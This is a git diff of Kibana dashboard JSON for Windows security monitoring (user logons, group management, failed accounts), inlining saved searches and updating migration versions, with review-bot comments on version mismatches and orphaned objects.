@@ -1244,12 +1331,21 @@ "y": 34 }, "panelIndex": "454bb008-9720-455e-8ab9-b2f47d25aa4f", - "panelRefName": "panel_454bb008-9720-455e-8ab9-b2f47d25aa4f", "title": "RDP Reconnections and Desconnections", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 28, + "i": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad", + "w": 12, + "x": 36, + "y": 34 + }, + "panelIndex": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad", "embeddableConfig": { "attributes": { "references": [ 
@@ -1469,23 +1565,54 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 28, - "i": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad", - "w": 12, - "x": 36, - "y": 34 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad", - "title": "Logon with Explicit Credentials [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Logon with Explicit Credentials [Windows System Security]" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "user.domain", + "winlog.logon.id", + "event.action", + "winlog.logon.type", + "winlog.event_data.SubjectUserName" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":{\"query\":\"4625\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"event.code\":\"4625\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\",\"key\":\"winlog.provider_name\",\"negate\":false,\"params\":{\"query\":\"Microsoft-Windows-Security-Auditing\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"winlog.provider_name\":\"Microsoft-Windows-Security-Auditing\"}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "User Logouts [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": 
"kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 46, @@ -1495,22 +1622,15 @@ "y": 62 }, "panelIndex": "28115147-8399-4fcd-95ce-ed0a4f4239e3", - "panelRefName": "panel_28115147-8399-4fcd-95ce-ed0a4f4239e3", "title": "Logout Details", "type": "search", - "version": "8.7.0" + "version": "8.0.0" } ], "timeRestore": false, "title": "[System Windows Security] User Logons", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-bae11b00-9bfc-11ea-87e4-49f31ec44891", - "migrationVersion": { - "dashboard": "8.7.0" - }, "references": [ { "id": "logs-*", @@ -1542,11 +1662,6 @@ "name": "3:c92cd2bc-c3a2-40cf-8932-aa33cee31978", "type": "index-pattern" }, - { - "id": "system-ce71c9a0-a25e-11e9-a422-d144027429da", - "name": "10:panel_10", - "type": "search" - }, { "id": "logs-*", "name": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0:indexpattern-datasource-layer-674fcc58-08d6-4ab5-b6cb-671d86391a1f", @@ -1567,11 +1682,6 @@ "name": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504:b48f02eb-a573-4758-a23f-ab02a2379751", "type": "index-pattern" }, - { - "id": "system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3", - "name": "454bb008-9720-455e-8ab9-b2f47d25aa4f:panel_454bb008-9720-455e-8ab9-b2f47d25aa4f", - "type": "search" - }, { "id": "logs-*", "name": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad:indexpattern-datasource-layer-4a1aa374-6802-4ad3-aaa8-5178d0944859", 
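Review bot: The three search panels converted from by-reference to by-value in this file (panelIndex "10", "454bb008-9720-455e-8ab9-b2f47d25aa4f" and "28115147-8399-4fcd-95ce-ed0a4f4239e3") get `"version": "8.0.0"`, while every other rewritten panel in these hunks carries `"version": "8.9.0"`; if the export tooling produced that value it is worth confirming that Kibana 8.9 applies the panel migrations the embedded `searchSourceJSON` with `indexRefName` entries expects, since nothing in the hunk pins that. The same hunks drop the dashboard-level references to the saved-search objects `system-ce71c9a0-a25e-11e9-a422-d144027429da`, `system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3` and `system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3` (and the user-management dashboard section earlier in this diff drops `system-7e178c80-fee1-11e9-8405-516218e3d268` and `system-324686c0-fefb-11e9-8405-516218e3d268`); if the package still ships those search objects and this commit does not delete them, they become orphaned installable objects and should be removed or shown to be referenced elsewhere. The inlined searches also carry `"description": ""`, so a one-line description of the filtered event codes would help the dashboard's maintainers.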
@@ -1583,10 +1693,42 @@ "type": "index-pattern" }, { - "id": "system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3", - "name": "28115147-8399-4fcd-95ce-ed0a4f4239e3:panel_28115147-8399-4fcd-95ce-ed0a4f4239e3", - "type": "search" + "type": "index-pattern", + "name": "10:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "10:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "454bb008-9720-455e-8ab9-b2f47d25aa4f:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "454bb008-9720-455e-8ab9-b2f47d25aa4f:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "28115147-8399-4fcd-95ce-ed0a4f4239e3:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "28115147-8399-4fcd-95ce-ed0a4f4239e3:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "28115147-8399-4fcd-95ce-ed0a4f4239e3:kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "id": "logs-*" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-bb858830-f412-11e9-8405-516218e3d268.json b/packages/system/kibana/dashboard/system-bb858830-f412-11e9-8405-516218e3d268.json index 656c57612a9..9ed66a498d0 100644 --- a/packages/system/kibana/dashboard/system-bb858830-f412-11e9-8405-516218e3d268.json +++ b/packages/system/kibana/dashboard/system-bb858830-f412-11e9-8405-516218e3d268.json 
@@ -1,4 +1,15 @@ { + "id": "system-bb858830-f412-11e9-8405-516218e3d268", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEzMSwxXQ==", "attributes": { "description": "Group management activity.", "kibanaSavedObjectMeta": { @@ -81,6 +92,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 7, + "i": "22", + "w": 16, + "x": 0, + "y": 0 + }, + "panelIndex": "22", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -103,21 +124,22 @@ "title": "Group Management Events - Description [Windows System Security]", "type": "markdown", "uiState": {} - } + }, + "type": "visualization" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 7, - "i": "22", - "w": 16, + "h": 13, + "i": "36", + "w": 9, "x": 0, - "y": 0 + "y": 55 }, - "panelIndex": "22", - "title": "", - "type": "visualization", - "version": "8.7.0" - }, - { + "panelIndex": "36", "embeddableConfig": { "attributes": { "references": [ @@ -387,21 +409,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Groups Created - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 13, - "i": "36", + "i": "37", "w": 9, - "x": 0, + "x": 9, "y": 55 }, - "panelIndex": "36", - "title": "Groups Created - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "37", "embeddableConfig": { "attributes": { "references": [ 
@@ -677,21 +700,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Group Changes - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 13, - "i": "37", + "i": "38", "w": 9, - "x": 9, + "x": 18, "y": 55 }, - "panelIndex": "37", - "title": "Group Changes - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "38", "embeddableConfig": { "attributes": { "references": [ @@ -961,21 +985,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 13, - "i": "38", - "w": 9, - "x": 18, - "y": 55 - }, - "panelIndex": "38", - "title": "Groups Deleted - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Groups Deleted - Table [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "39", + "w": 16, + "x": 0, + "y": 75 + }, + "panelIndex": "39", "embeddableConfig": { "attributes": { "references": [ @@ -1276,21 +1301,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Added - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 14, - "i": "39", - "w": 16, - "x": 0, + "i": "40", + "w": 17, + "x": 16, "y": 75 }, - "panelIndex": "39", - "title": "Users Added - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "40", "embeddableConfig": { "attributes": { "references": [ 
@@ -1591,21 +1617,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Removed from Group - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 14, - "i": "40", - "w": 17, - "x": 16, + "i": "42", + "w": 15, + "x": 33, "y": 75 }, - "panelIndex": "40", - "title": "Users Removed from Group - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "42", "embeddableConfig": { "attributes": { "references": [ 
@@ -1833,23 +1860,48 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "42", - "w": 15, - "x": 33, - "y": 75 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "42", - "title": "Group Enumeration - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Group Enumeration - Table [Windows System Security]" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "source.domain", + "source.ip", + "winlog.logon.id", + "winlog.logon.type" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4624\"],\"type\":\"phrases\",\"value\":\"4624\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4624\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Logon Details [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 20, 
@@ -1859,14 +1911,48 @@ "y": 48 }, "panelIndex": "43", - "panelRefName": "panel_43", "title": "Logon Details [Windows System Security]", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "event.action", + "group.name", + "group.domain", + "user.name", + "user.domain", + "host.name" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4731\",\"4732\",\"4733\",\"4734\",\"4735\",\"4737\",\"4764\",\"4727\",\"4728\",\"4729\",\"4730\",\"4754\",\"4755\",\"4756\",\"4757\",\"4758\",\"4799\",\"4749\",\"4750\",\"4751\",\"4752\",\"4753\",\"4759\",\"4760\",\"4761\",\"4762\",\"4763\",\"4744\",\"4745\",\"4746\",\"4748\"],\"type\":\"phrases\",\"value\":\"4731, 4732, 4733, 4734, 4735, 4737, 4764, 4727, 4728, 4729, 4730, 4754, 4755, 4756, 4757, 4758, 4799, 4749, 4750, 4751, 4752, 4753, 4759, 4760, 4761, 4762, 4763, 4744, 4745, 4746, 
4748\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4731\"}},{\"match_phrase\":{\"event.code\":\"4732\"}},{\"match_phrase\":{\"event.code\":\"4733\"}},{\"match_phrase\":{\"event.code\":\"4734\"}},{\"match_phrase\":{\"event.code\":\"4735\"}},{\"match_phrase\":{\"event.code\":\"4737\"}},{\"match_phrase\":{\"event.code\":\"4764\"}},{\"match_phrase\":{\"event.code\":\"4727\"}},{\"match_phrase\":{\"event.code\":\"4728\"}},{\"match_phrase\":{\"event.code\":\"4729\"}},{\"match_phrase\":{\"event.code\":\"4730\"}},{\"match_phrase\":{\"event.code\":\"4754\"}},{\"match_phrase\":{\"event.code\":\"4755\"}},{\"match_phrase\":{\"event.code\":\"4756\"}},{\"match_phrase\":{\"event.code\":\"4757\"}},{\"match_phrase\":{\"event.code\":\"4758\"}},{\"match_phrase\":{\"event.code\":\"4799\"}},{\"match_phrase\":{\"event.code\":\"4749\"}},{\"match_phrase\":{\"event.code\":\"4750\"}},{\"match_phrase\":{\"event.code\":\"4751\"}},{\"match_phrase\":{\"event.code\":\"4752\"}},{\"match_phrase\":{\"event.code\":\"4753\"}},{\"match_phrase\":{\"event.code\":\"4759\"}},{\"match_phrase\":{\"event.code\":\"4760\"}},{\"match_phrase\":{\"event.code\":\"4761\"}},{\"match_phrase\":{\"event.code\":\"4762\"}},{\"match_phrase\":{\"event.code\":\"4763\"}},{\"match_phrase\":{\"event.code\":\"4744\"}},{\"match_phrase\":{\"event.code\":\"4745\"}},{\"match_phrase\":{\"event.code\":\"4746\"}},{\"match_phrase\":{\"event.code\":\"4748\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Group Management Details - Search View [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": 
"logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 22, @@ -1876,12 +1962,21 @@ "y": 89 }, "panelIndex": "45", - "panelRefName": "panel_45", "title": "Group Management Operations Details [Windows System Security]", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 7, + "i": "663e0493-2070-407b-9d00-079915cce7e7", + "w": 32, + "x": 16, + "y": 0 + }, + "panelIndex": "663e0493-2070-407b-9d00-079915cce7e7", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -1904,21 +1999,22 @@ "title": "Dashboard links [Windows System Security]", "type": "markdown", "uiState": {} - } - }, - "gridData": { - "h": 7, - "i": "663e0493-2070-407b-9d00-079915cce7e7", - "w": 32, - "x": 16, - "y": 0 + }, + "type": "visualization" }, - "panelIndex": "663e0493-2070-407b-9d00-079915cce7e7", - "title": "", - "type": "visualization", - "version": "8.7.0" + "title": "" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 20, + "i": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290", + "w": 20, + "x": 0, + "y": 7 + }, + "panelIndex": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290", "embeddableConfig": { "attributes": { "references": [ 
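Review bot: Panels 43 and 45, which now carry their saved search by value, are written with `"version": "8.0.0"` while every other panel in this dashboard is stamped `"version": "8.9.0"` (the panel-45 change is in the hunk starting `@@ -1876,12 +1962,21 @@`); if the by-value search embeddable really serializes at 8.0.0 this is fine, but if the value was carried over from the deleted search object's `"migrationVersion": {"search": "8.0.0"}` it is a format-version mismatch that Kibana's panel migrations would have to tolerate on load. The same dashboard also ends up with both `"migrationVersion": {"dashboard": "8.9.0"}` near the top of the file and `"typeMigrationVersion": "8.9.0"` at the bottom, so the migration marker is present in both its old and new form. Worth a quick import into a clean 8.9 stack to confirm both search panels render and the object is not re-migrated on every load.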
@@ -2240,21 +2336,22 @@ "visualizationType": "lnsPie" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Group Management Events - Event Actions [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290", - "w": 20, - "x": 0, + "i": "74edddd5-2dc5-41b8-b4f2-bf9c95218f1b", + "w": 12, + "x": 20, "y": 7 }, - "panelIndex": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290", - "title": "Group Management Events - Event Actions [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "74edddd5-2dc5-41b8-b4f2-bf9c95218f1b", "embeddableConfig": { "attributes": { "references": [ @@ -2600,21 +2697,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Group Management Events - Event Actions - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "74edddd5-2dc5-41b8-b4f2-bf9c95218f1b", - "w": 12, - "x": 20, + "i": "3016efc8-187d-4630-892d-af2160a584d7", + "w": 16, + "x": 32, "y": 7 }, - "panelIndex": "74edddd5-2dc5-41b8-b4f2-bf9c95218f1b", - "title": "Group Management Events - Event Actions - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "3016efc8-187d-4630-892d-af2160a584d7", "embeddableConfig": { "attributes": { "references": [ 
@@ -2737,21 +2835,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 20, - "i": "3016efc8-187d-4630-892d-af2160a584d7", - "w": 16, - "x": 32, - "y": 7 - }, - "panelIndex": "3016efc8-187d-4630-892d-af2160a584d7", - "title": "Group Management Events - Target Groups [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Group Management Events - Target Groups [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 21, + "i": "33cef054-615a-49cb-bb2e-eb55fab96ae5", + "w": 27, + "x": 0, + "y": 27 + }, + "panelIndex": "33cef054-615a-49cb-bb2e-eb55fab96ae5", "embeddableConfig": { "attributes": { "references": [ @@ -3144,21 +3243,22 @@ "visualizationType": "lnsHeatmap" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Group Management Events - Groups vs Actions - Heatmap [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 21, - "i": "33cef054-615a-49cb-bb2e-eb55fab96ae5", - "w": 27, - "x": 0, + "i": "e0d495aa-f897-403f-815b-6116fae330b7", + "w": 21, + "x": 27, "y": 27 }, - "panelIndex": "33cef054-615a-49cb-bb2e-eb55fab96ae5", - "title": "Group Management Events - Groups vs Actions - Heatmap [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "e0d495aa-f897-403f-815b-6116fae330b7", "embeddableConfig": { "attributes": { "references": [ 
@@ -3531,21 +3631,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 21, - "i": "e0d495aa-f897-403f-815b-6116fae330b7", - "w": 21, - "x": 27, - "y": 27 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "e0d495aa-f897-403f-815b-6116fae330b7", - "title": "Group Management Action Distribution over Time [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Group Management Action Distribution over Time [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "e861343c-a5c9-4a8f-aacf-175a2d697587", + "w": 9, + "x": 0, + "y": 48 + }, + "panelIndex": "e861343c-a5c9-4a8f-aacf-175a2d697587", "embeddableConfig": { "attributes": { "references": [], @@ -3655,21 +3756,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "e861343c-a5c9-4a8f-aacf-175a2d697587", + "i": "36142fad-01b3-43eb-a7c5-1b71fa6aa3bc", "w": 9, - "x": 0, + "x": 9, "y": 48 }, - "panelIndex": "e861343c-a5c9-4a8f-aacf-175a2d697587", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "36142fad-01b3-43eb-a7c5-1b71fa6aa3bc", "embeddableConfig": { "attributes": { "references": [], 
@@ -3779,21 +3881,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "36142fad-01b3-43eb-a7c5-1b71fa6aa3bc", + "i": "b03662fb-926d-49e0-b543-18ae6f526395", "w": 9, - "x": 9, + "x": 18, "y": 48 }, - "panelIndex": "36142fad-01b3-43eb-a7c5-1b71fa6aa3bc", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "b03662fb-926d-49e0-b543-18ae6f526395", "embeddableConfig": { "attributes": { "references": [], @@ -3903,21 +4006,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "b03662fb-926d-49e0-b543-18ae6f526395", - "w": 9, - "x": 18, - "y": 48 + "i": "744ba653-cbed-4af4-8114-ebe20b7ce075", + "w": 16, + "x": 0, + "y": 68 }, - "panelIndex": "b03662fb-926d-49e0-b543-18ae6f526395", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "744ba653-cbed-4af4-8114-ebe20b7ce075", "embeddableConfig": { "attributes": { "references": [], @@ -4027,21 +4131,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "744ba653-cbed-4af4-8114-ebe20b7ce075", - "w": 16, - "x": 0, + "i": "81b505b6-9694-40ed-8800-dfc5f41af3c8", + "w": 17, + "x": 16, "y": 68 }, - "panelIndex": "744ba653-cbed-4af4-8114-ebe20b7ce075", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "81b505b6-9694-40ed-8800-dfc5f41af3c8", "embeddableConfig": { "attributes": { "references": [], 
@@ -4151,21 +4256,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "81b505b6-9694-40ed-8800-dfc5f41af3c8", - "w": 17, - "x": 16, + "i": "2c3d475b-54d9-472a-b97a-03a37d7c944b", + "w": 15, + "x": 33, "y": 68 }, - "panelIndex": "81b505b6-9694-40ed-8800-dfc5f41af3c8", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "2c3d475b-54d9-472a-b97a-03a37d7c944b", "embeddableConfig": { "attributes": { "references": [], @@ -4275,31 +4381,16 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 7, - "i": "2c3d475b-54d9-472a-b97a-03a37d7c944b", - "w": 15, - "x": 33, - "y": 68 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "2c3d475b-54d9-472a-b97a-03a37d7c944b", - "title": "", - "type": "lens", - "version": "8.7.0" + "title": "" } ], "timeRestore": false, "title": "[System Windows Security] Group Management Events", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-bb858830-f412-11e9-8405-516218e3d268", - "migrationVersion": { - "dashboard": "8.7.0" - }, "references": [ { "id": "logs-*", @@ -4371,16 +4462,6 @@ "name": "42:5fd25934-f4ed-4561-8e83-22d8642198fe", "type": "index-pattern" }, - { - "id": "system-7e178c80-fee1-11e9-8405-516218e3d268", - "name": "43:panel_43", - "type": "search" - }, - { - "id": "system-9066d5b0-fef2-11e9-8405-516218e3d268", - "name": "45:panel_45", - "type": "search" - }, { "id": "logs-*", "name": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290:indexpattern-datasource-layer-d498ce52-e422-4548-869e-12b54ca2a5de", 
@@ -4425,7 +4506,29 @@ "id": "logs-*", "name": "e0d495aa-f897-403f-815b-6116fae330b7:b7ec06e9-b2f3-4ec6-813b-e8cc45150c28", "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "43:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "43:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "45:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "45:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-d401ef40-a7d5-11e9-a422-d144027429da.json b/packages/system/kibana/dashboard/system-d401ef40-a7d5-11e9-a422-d144027429da.json index 3f024f3a83a..072fcf8f5fb 100644 --- a/packages/system/kibana/dashboard/system-d401ef40-a7d5-11e9-a422-d144027429da.json +++ b/packages/system/kibana/dashboard/system-d401ef40-a7d5-11e9-a422-d144027429da.json @@ -1,4 +1,15 @@ { + "id": "system-d401ef40-a7d5-11e9-a422-d144027429da", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEzMiwxXQ==", "attributes": { "description": "Failed and blocked accounts.", "kibanaSavedObjectMeta": { @@ -1871,10 +1882,6 @@ "title": "[System Windows Security] Failed and Blocked Accounts", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T20:57:22.959Z", - "id": "system-d401ef40-a7d5-11e9-a422-d144027429da", - "managed": false, "references": [ { "id": "logs-*", 
@@ -1992,6 +1999,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/search/system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3.json b/packages/system/kibana/search/system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3.json deleted file mode 100644 index 82486ae0c14..00000000000 --- a/packages/system/kibana/search/system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3.json +++ /dev/null 
